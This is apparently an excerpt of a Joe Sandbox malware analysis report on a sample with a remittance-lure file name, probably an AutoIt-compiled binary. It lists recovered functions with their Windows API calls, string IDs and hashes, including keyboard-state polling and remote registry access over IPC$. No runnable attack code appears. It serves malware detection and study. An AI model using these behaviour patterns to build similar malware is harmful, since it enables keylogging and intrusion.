                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                      • String ID: X
                                                                      • API String ID: 3104067586-3081909835
                                                                      • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                      • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                      APIs
                                                                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                      • _wcslen.LIBCMT ref: 0046CDB0
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                      Strings
                                                                      • NULL Pointer assignment, xrefs: 0046CEA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 440038798-2785691316
                                                                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                      • _wcslen.LIBCMT ref: 004610A3
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 4136854206-1241985126
                                                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                      APIs
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                      • String ID: 2
                                                                      • API String ID: 1331449709-450215437
                                                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                      • __swprintf.LIBCMT ref: 00460915
                                                                      • __swprintf.LIBCMT ref: 0046092D
                                                                      • _wprintf.LIBCMT ref: 004609E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                      • API String ID: 3054410614-2561132961
                                                                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 600699880-22481851
                                                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyWindow
                                                                      • String ID: static
                                                                      • API String ID: 3375834691-2160076837
                                                                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                      • API String ID: 2907320926-3566645568
                                                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                      APIs
                                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                      • DeleteObject.GDI32(00780045), ref: 00470A04
                                                                      • DestroyIcon.USER32(00740069), ref: 00470A1C
                                                                      • DeleteObject.GDI32(81F8163D), ref: 00470A34
                                                                      • DestroyWindow.USER32(0070006D), ref: 00470A4C
                                                                      • DestroyIcon.USER32(?), ref: 00470A73
                                                                      • DestroyIcon.USER32(?), ref: 00470A81
                                                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 1237572874-0
                                                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                      • GetKeyState.USER32(00000011), ref: 00444903
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                      • String ID:
                                                                      • API String ID: 3413494760-0
                                                                      • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                      • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                      • String ID: AU3_FreeVar
                                                                      • API String ID: 2634073740-771828931
                                                                      • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                      • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                      APIs
                                                                      • CoInitialize.OLE32 ref: 0046C63A
